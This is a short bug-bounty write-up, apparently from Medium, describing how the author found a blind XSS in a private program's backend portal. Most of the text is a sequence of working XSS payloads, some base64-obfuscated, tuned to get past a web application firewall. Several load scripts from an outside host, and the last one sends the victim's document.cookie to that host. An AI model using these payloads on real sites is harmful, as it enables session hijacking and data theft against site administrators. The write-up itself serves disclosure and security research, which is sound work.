Blind Xss (A mind game to win the battle)

Dirtycoder
Dec 11, 2019 · 2 min read

In this write-up, I will explain how I exploited a blind XSS in the backend portal of a program.

I will not take much time and keep the write-up simple and point to point.

It was a private program so we will call it https://redacted.com.

I used https://blindf.com in order to exploit it. It's a platform/tool/framework to find blind XSS.

Attack Starts:

  1. Found a form on https://redacted.com
  2. I put Bhtml payload + BXSS payload in the text field

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"></script><script src=https://blindf.com/bx.php></script>

Result: WAF stopped me to submit the form.

3. I removed the BXSS payload. Now the payload was

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>

Result: WAF did not stop me and I successfully submitted the form. Next day Blindf confirmed the BHTML payload execution in the backend. Now It’s time to submit the Bxss payload. Because I knew that the backend portal is vulnerable and I just have to submit the Bxss payload.

4. Next Payload used. BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"><svg onload='with(top)body.appendChild(createElement("script")).src="https://blindf.com/bx.php"'>

Result: WAF did not stop me and I successfully submitted the payload. But again only BHTML payload worked and BXSS did not. Now again, its time to modify the payload.

5. Next payload used. BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">   sfds"><base href="https://blindf.com"><script nonce='secret' src='./bx.php'></script>

Result: WAF stopped me and I could not submit the form. Frustration was on the peak. Again its time to change the payload.

6. Next payload used. BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmxpbmRmLmNvbS9ieC5waHAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Result: Bypassed the WAF but again only BHTML worked and BXSS failed. Now it was not the time of payload modification but thinking about the situation.

Situation step by step:

  • I used BHTML + BXSS payloads.
  • Some Bxss payloads bypassed the WAF but did not execute in the backend portal where Bhtml payloads were going well and I was receiving back response from my BHTML payloads.
  • Maybe something was stopping my remote js file from execution. [CORS or Same-origin policy]
  • So I have to execute BXSS without including remote js file.
  • But how can I confirm the payload execution in the backend if I just show an alert popup to them
  • “<img” tag was working but I could not include remote js file.
  • I have to make a payload that can respond back and confirm js code execution.

7. Now it’s time to modify the payload and attack again.

Payload used:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">  <img src=https://blindf.com/a.jpg onload=this.src='https://blindf.com/oc.php/?c='+document.cookie>

Result: WAF bypassed. Bhtml payload executed. Bxss payload executed and I got the cookie value.

Severity: Critical (9 ~ 10)

Bounty: $1000

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade